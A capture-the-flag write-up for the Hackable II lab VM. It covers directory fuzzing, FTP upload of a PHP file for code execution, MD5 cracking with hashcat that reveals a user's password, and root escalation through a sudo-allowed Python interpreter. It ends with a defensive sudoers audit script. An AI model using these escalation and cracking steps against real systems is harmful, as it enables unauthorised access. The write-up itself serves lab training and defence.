Last updated: 15 Apr 24 09:28:45 (UTC)

Write-Up Hackable-II

Hackable-II

By Lawcky 07/01/24

Introduction

An easy VM.

Difficulty : Easy

Additional info:

Name: Hackable: II
Release date: 15 Jun 2021
Author: Elias Sousa
Series: Hackable

|NOTE| The full scan outputs are not copied here, as they would be far too voluminous; click here to see them.


In this write-up

  • nmap
  • nikto
  • ffuf
  • hashcat
  • ftp
  • uploading rce using ftp
  • python (os module)

Write-UP

FUZZING

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.43/FUZZ -fc 403

Patterns fuzzed: FUZZ, .FUZZ, FUZZ.txt, .FUZZ.txt

Understanding the site

What we find in the FTP connection (screenshot) means the FTP files are accessible at http://192.168.1.43/files/**ourfiles**

Let's try to upload a PHP file over FTP to execute code on the server.

It worked!

Privilege Escalation

www-data to user shrek

To find the hidden file .runme.sh:

find / -name .runme.sh 2>/dev/null

hashcat -m 0 hash /usr/share/rockyou.txt

shrek:onion

First flag found.


from shrek to root

sudo -l

We can easily exploit this to get a root shell using Python's “os” module.

sudo /usr/bin/python3.5

import os;

os.execl("/bin/sh", "sh", "-p")

Got the second flag.
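
Seen from the defender's side, a sudo rule that grants a bare interpreter such as /usr/bin/python3.5 is what an audit should catch. The following is an added example, not part of the original write-up: it parses `sudo -l` output and flags rules that grant an interpreter without fixed arguments. The sample listing, the interpreter list and the name audit_sudo_listing are constructed for illustration.

```python
import os
import re

# Programs that run arbitrary code as the sudo target user when granted without
# fixed arguments. Assumption: illustrative list, not exhaustive.
SHELL_CAPABLE = re.compile(
    r"^(python|perl|ruby|php|node|lua|bash|sh|zsh|dash|vim?|awk|gawk|find|env)[\d.]*$"
)

# Constructed sample of `sudo -l` output (not copied from the VM's screenshot).
SAMPLE = """\
User shrek may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/python3.5
    (root) /usr/sbin/service apache2 restart, /usr/bin/apt-get update
    (ALL : ALL) ALL
"""

# "(runas) [TAG: ...] cmd1, cmd2": one rule line of the listing.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_listing(text):
    """Return (runas, command, nopasswd, reason) for each risky sudo rule."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults or blank line
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            argv = cmd.split()
            if cmd == "ALL":
                reason = "unrestricted"
            elif len(argv) == 1 and SHELL_CAPABLE.match(os.path.basename(argv[0])):
                reason = "interpreter with free arguments"
            else:
                continue  # not flagged by this check (which does not prove it safe)
            findings.append((m.group("runas").strip(), cmd, nopasswd, reason))
    return findings


if __name__ == "__main__":
    for runas, cmd, nopasswd, reason in audit_sudo_listing(SAMPLE):
        print(f"{cmd} as ({runas}) nopasswd={nopasswd}: {reason}")
```

The usual fix is to drop the interpreter from sudoers and grant only the specific script or command that is needed, with fixed arguments.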